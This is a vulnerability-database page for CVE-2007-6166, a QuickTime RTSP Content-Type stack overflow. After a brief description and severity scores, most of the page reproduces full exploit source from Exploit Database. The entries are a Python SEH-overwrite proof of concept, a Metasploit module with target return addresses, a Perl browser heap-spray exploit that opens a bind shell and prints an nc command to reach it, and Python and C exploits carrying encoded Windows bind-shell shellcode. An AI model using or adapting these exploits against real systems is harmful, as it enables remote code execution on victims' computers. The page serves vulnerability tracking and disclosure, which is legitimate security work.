Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack-based buffer overflow in Apple QuickTime before 7.3.1, as used in QuickTime Player on Windows XP and Safari on Mac OS X, allows remote Real Time Streaming Protocol (RTSP) servers to execute arbitrary code via an RTSP response with a long Content-Type header.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4648
Publication date : 2007-11-22 23h00 +00:00
Author : h07
EDB Verified : Yes
#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish
# Details:..
#
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
#
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [42424242])
# ----------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00
# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# --> N/A
# ----------------------------------------------------------------
##
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
tmp = "A" * 995
tmp += "B" * 4096
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# EoF
# milw0rm.com [2007-11-23]
Exploit Database EDB-ID : 16873
Publication date : 2010-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: quicktime_rtsp_content_type.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
# Description?
# Author?
'Version' => '$Revision: 10617 $',
'Platform' => 'osx',
'References' =>
[
[ 'CVE', '2007-6166' ],
[ 'OSVDB', '40876'],
[ 'BID', '26549' ],
],
'Payload' =>
{
'Space' => 3841,
'BadChars' => "\x00\x0a\x0d",
'MaxNops' => 0,
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
{
'Arch' => ARCH_PPC,
'Ret' => 0x8fe3f88c,
'RetOffset' => 551,
'PayloadOffset' => 879
}
],
[ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
{
'Arch' => ARCH_PPC,
'Ret' => 0x8fe042e0,
'RetOffset' => 615,
'PayloadOffset' => 3351
}
],
[ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
{
'Arch' => ARCH_X86,
'Offset' => 307,
'Writable' => 0xa0bd0f10, # libSystem __IMPORT
# The rest of these are all in libSystem __TEXT
'ret' => 0x9015d336,
'poppopret' => 0x9015d334,
'setjmp' => 0x900bc438,
'strdup' => 0x90012f40,
'jmp_eax' => 0x9014a77f
}
],
[ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
{
'Arch' => ARCH_X86,
'Offset' => 307,
'Writable' => 0x8fe66448, # dyld __IMPORT
# The rest of these addresses are in dyld __TEXT
'ret' => 0x8fe1ceee,
'poppopret' => 0x8fe220d7,
'setjmp' => 0x8fe1ceb0,
'strdup' => 0x8fe1cd77,
'jmp_eax' => 0x8fe01041
}
],
],
'DefaultTarget' => 2,
'DisclosureDate' => 'Nov 23 2007'))
end
######
# XXX: This does not work on Tiger apparently
def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" + # mov eax, esp
"\x83\xc0\x0c" + # add eax, byte +0xc
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
"\xc3" # ret
setjmp = target['setjmp']
writable = target['Writable']
strdup = target['strdup']
jmp_eax = target['jmp_eax']
exec_payload_from_heap_stub =
frag0 +
[setjmp].pack('V') +
[writable + 32, writable].pack("V2") +
frag1 +
"X" * 20 +
[setjmp].pack('V') +
[writable + 24, writable, strdup, jmp_eax].pack("V4") +
"X" * 4
end
def on_client_connect(client)
print_status("Got client connection...")
if (target['Arch'] == ARCH_PPC)
ret_offset = target['RetOffset']
payload_offset = target['PayloadOffset']
# Create pattern sized up to payload, since it always follows
# the return address.
boom = Rex::Text.pattern_create(payload_offset)
boom[ret_offset, 4] = [target['Ret']].pack('N')
boom[payload_offset, payload.encoded.length] = payload.encoded
else
boom = Rex::Text.pattern_create(327)
boom[307, 4] = [target['ret']].pack('V')
boom[311, 4] = [target['ret']].pack('V')
boom[315, 4] = [target['poppopret']].pack('V')
boom[319, 4] = [target['Writable']].pack('V')
boom[323, 4] = [target['Writable']].pack('V')
#
# Create exec-payload-from-heap-stub, but split it in two.
# The first word must be placed as the overwritten saved ebp
# in the attack string. The rest is placed after the
# Writable memory addresses.
#
magic = make_exec_payload_from_heap_stub()
boom[303, 4] = magic[0, 4]
boom += magic[4..-1]
#
# Place the payload immediately after the stub as it expects
#
boom += payload.encoded
end
body = " "
header =
"RTSP/1.0 200 OK\r\n"+
"CSeq: 1\r\n"+
"Content-Type: #{boom}\r\n"+
"Content-Length: #{body.length}\r\n\r\n"
print_status("Sending RTSP response...")
client.put(header + body)
print_status("Sleeping...")
select(nil,nil,nil,1)
print_status("Starting handler...")
handler(client)
print_status("Closing client...")
service.close_client(client)
end
end
Exploit Database EDB-ID : 6013
Publication date : 2008-07-05 22h00 +00:00
Author : krafty
EDB Verified : Yes
#!/usr/bin/perl
#
# quickbite.pl
#
# Safari + Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
#
# Tested with OS X 10.4.
# On victim, browse to http://server:8080/
# Binds shell on port 4444.
#
# by krafty
#
# greets to sk, halvar, grugq, and all the ethnical hackers
# extra thanks to ddz for osx hackery
# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc
# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
# milw0rm and packetstorm rule
# Bring back the days of technotronic and r00tshell! Freedom.
#
# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:
# "What's worse than biting into an apple and finding a worm?"
# "Finding half a worm".
use Socket;
use IO::Handle;
use constant MY_HTTP_PORT => 8080;
$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";
$buf = chr(0x11) x 6000;
# don't touch anything below this line
$html = <<ENDHTML;
<script>
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix + shellcode;
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
memory[i] = spray + shellcode;
var url = "rtsp://" + location.host + "/x.mp3";
document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />");
</script>
ENDHTML
$rtsp_body =
"v=0\r\n" .
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
"s=MPEG-1 or 2 Audio\r\n" .
"i=1.mp3\r\n" .
"t=0 0\r\n" .
"a=tool:hello\r\n" .
"a=type:broadcast\r\n" .
"a=control:*\r\n" .
"a=range:npt=0-213.077\r\n" .
"a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" .
"a=x-qt-text-inf:1.mp3\r\n" .
"m=audio 0 RTP/AVP 14\r\n" .
"c=IN IP4 0.0.0.0\r\n" .
"a=control:track1\r\n";
$content_length = length($rtsp_body);
$rtsp_header =
"RTSP/1.0 200 OK\r\n" .
"CSeq: 1\r\n" .
"Date: 0x00 :P\r\n" .
"Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" .
"Content-Type: $buf\r\n" .
"Content-Length: $content_length\r\n\r\n";
$rtsp = $rtsp_header . $rtsp_body;
$http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n";
$| = 1;
my $port = MY_HTTP_PORT;
my $protocol = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in($port,INADDR_ANY);
bind(SOCK,$my_addr) or die "bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "listen() failed: $!";
warn "waiting for incoming connections on port $port...\n";
$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
next unless my $remote_addr = accept(SESSION,SOCK);
my ($port,$hisaddr) = sockaddr_in($remote_addr);
warn "Connection from [",inet_ntoa($hisaddr),",$port]\n";
$victim = $hisaddr;
SESSION->autoflush(1);
$request = "";
while(<SESSION>) {
$request_line = $_;
$request .= $request_line;
chomp($request_line);
if($request_line =~ /DESCRIBE rtsp/) {
$repeat = 0;
}
$x = length($request_line);
if($x <= 1) {
last;
}
}
print STDERR $request;
if($repeat) {
print SESSION $http_header . $html;
}
else {
print SESSION $rtsp;
}
warn "Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
close SESSION;
}
print "Connect to ".inet_ntoa($victim).":4444 after 5 seconds\n";
print "nc -nvv ".inet_ntoa($victim)." 4444\nEnjoy!\n";
# milw0rm.com [2008-07-06]
Exploit Database EDB-ID : 4657
Publication date : 2007-11-25 23h00 +00:00
Author : muts
EDB Verified : Yes
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
# ExitProcess shellcode will kill browser, but keep the shell open
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90" # short jump for 7.2
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions.
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# milw0rm.com [2007-11-26]
Exploit Database EDB-ID : 4651
Publication date : 2007-11-23 23h00 +00:00
Author : InTeL
EDB Verified : Yes
/*
=============================================================
Apple Quicktime (Vista/XP RSTP Response) Remote Code Exec
=============================================================
Discovered by: h07
Author: InTeL
*Tested on:
- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec
- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec
- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
Notes:
[*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :)
[*]All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules, that is how u bypass the SEH
Restrictions in XP and in Vista!! so we use Addys from there.
[*]There are ALOT of filtered characters so choose your shellcode wisely or you will run into Access Violations
Since I didnt feel like wasting my time going through all the filtered Characters, go through it yourself.
- Here are some \x4b, \x59, \x79
[*]I did hit my shellcode but b/c i havent gone through all the filtered characters i got an Access Violation
in the shellcode
[*]Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs
[***]Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit.
http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html
cough use w/ an iframe cough
Shoutz: UIA, u kno who u ppl are
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"wsock32.lib")
int info();
#define port 554
char header_part1[] =
"RTSP/1.0 200 OK\r\n"
"CSeq: 1\r\n"
"Date: 0x00 :P\r\n"
"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n"
"Content-Type: ";
char header_part2[] =
"Content-Length: ";
char body[] =
"v=0\r\n"
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n"
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n"
"i=1.mp3\r\n" "t=0 0\r\n"
"a=tool:ciamciaramcia\r\n"
"a=type:broadcast\r\n"
"a=control:*\r\n"
"a=range:npt=0-213.077\r\n"
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n"
"a=x-qt-text-inf:1.mp3\r\n"
"m=audio 0 RTP/AVP 14\r\n"
"c=IN IP4 0.0.0.0\r\n"
"a=control:track1\r\n";
//Place Your Shellcode here but keep the name
char scode[] =
"\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7"
"\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15"
"\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f"
"\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7"
"\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42"
"\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a"
"\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30"
"\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6"
"\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35"
"\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96";
int main(int argc, char *argv[])
{
char evilbuf[5200], recvbuf[512];
char *strptr = NULL;
char contentlength[] = "327";
int i, pos;
struct sockaddr_in saddr;
WSADATA wsaData;
SOCKET sock, vicsock;
info();
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
printf("Unable to initialize Winsock \n");
exit(1);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
printf("Socket Error \n");
WSACleanup();
exit(1);
}
memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = INADDR_ANY;
saddr.sin_port = htons(port);
if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
printf("Bind Error \r\n");
closesocket(sock);
WSACleanup();
exit(1);
}
if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) {
printf("Listen Error \r\n");
closesocket(sock);
WSACleanup();
exit(1);
}
printf("[+] Listening on port: %d\r\n", port);
if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) {
printf("[+]Victim Connected \r\n");
memset(recvbuf,0,sizeof(recvbuf));
recv(vicsock, recvbuf, 512, 0);
memset(evilbuf, '\0', sizeof(evilbuf));
strcpy(evilbuf, header_part1);
/*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/
if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista
strptr = NULL;
if((strptr =strstr(recvbuf, "7.3")) != NULL) {
printf("Victim is running Vista and QKTime Version 7.3\r\n");
pos = strlen(header_part1);
for(i = 1; i<=991;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "\xeb\x32\x90\x90");
strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
else {
strptr = NULL;
if((strptr =strstr(recvbuf, "7.2")) != NULL) {
printf("Victim is running Vista and QKTime Version 7.2\r\n");
pos = strlen(header_part1);
for(i = 1; i<=987;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "\xeb\x32\x90\x90");
strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
}
}
else { //Win XP SP2
strptr = NULL;
if((strptr = strstr(recvbuf, "5.1")) != NULL) {
strptr = NULL;
if((strptr =strstr(recvbuf, "Pack 2")) != NULL) {
strptr = NULL;
if((strptr =strstr(recvbuf, "7.3")) != NULL) {
printf("Victim is running XP SP2 and QKTime Version 7.3\r\n");
pos = strlen(header_part1);
for(i = 1; i<=991;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "\xeb\x32\x90\x90");
strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
else{
strptr = NULL;
if((strptr =strstr(recvbuf, "7.2")) != NULL) {
printf("Victim is running XP SP2 and QKTime Version 7.2\r\n");
pos = strlen(header_part1);
for(i = 1; i<=987;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "\xeb\x32\x90\x90");
strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
}
}
}
else {
printf("[-] Not a Valid Target, Shutting Down");
closesocket(vicsock);
closesocket(sock);
WSACleanup();
exit(1);
}
}
for(i=0; i<200;i++) {
evilbuf[pos] = '\x90';
pos++;
}
for(i=0; i<strlen(scode);i++){
evilbuf[pos] = scode[i];
pos++;
}
int rest = 4096-(200+strlen(scode));
for(i=0; i<rest;i++) {
evilbuf[pos] = '\x90';
pos++;
}
strcat(evilbuf, "\r\n");
pos +=2;
for(i = 0; i<sizeof(header_part2);i++) {
evilbuf[pos] = header_part2[i];
pos++;
}
strcat(evilbuf, contentlength);
strcat(evilbuf, "\r\n");
Sleep(1);
strcat(evilbuf, "\r\n");
pos +=8;
strcat(evilbuf, body);
printf("%s", evilbuf);
printf("[+] Evil Packet Generated \r\n");
if(send(vicsock, evilbuf, strlen(evilbuf), 0) != SOCKET_ERROR)
printf("[+] Evil Packet Sent \r\n");
else
printf("[-] Evil Packet Sending Failed \r\n");
closesocket(vicsock);
closesocket(sock);
WSACleanup();
}
else {
printf("Accept failed");
closesocket(sock);
WSACleanup();
}
return 0;
}
int info()
{
printf("[+]Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit\r\n");
printf("[+]Author: InTeL\r\n");
printf("[+]Tested on:\r\n\t- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec\r\n\t- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec\r\n\t- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\r\n\t- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\r\n");
printf("[+]Shout to: UIA, you kno who u ppl are\r\n\r\n");
return 0;
}
// milw0rm.com [2007-11-24]
Exploit Database EDB-ID : 4664
Publication date : 2007-11-26 23h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes
___ Everyone Loves
O|0_+|O the Hypnotoad...
|...|
| |
=o0O=====O0o===============================
| QuickTime RTSP Response Content-type |
| remote stack rewrite exploit for IE 6/7 |
| by Yag Kohha (skyhole [at] gmail.com) |
===========================================
Exploit tested on:
- Windows Vista
- Windows XP SP2
- IE 6.0/ 7.0
- QT 7.2/ 7.3
Exploit requirements:
Target: Windows Vista/ XP SP2 , IE 6.0/7.0, QT 7.2/7.3
Server: Linux, Perl, Apache web- server
Whats inside:
index.html - hypertext document with heap spray javascript and QT plugin call with playlist.mov (place to public web-folder)
server - rtsp- server emulator (run in your linux shell in background mode "./server&")
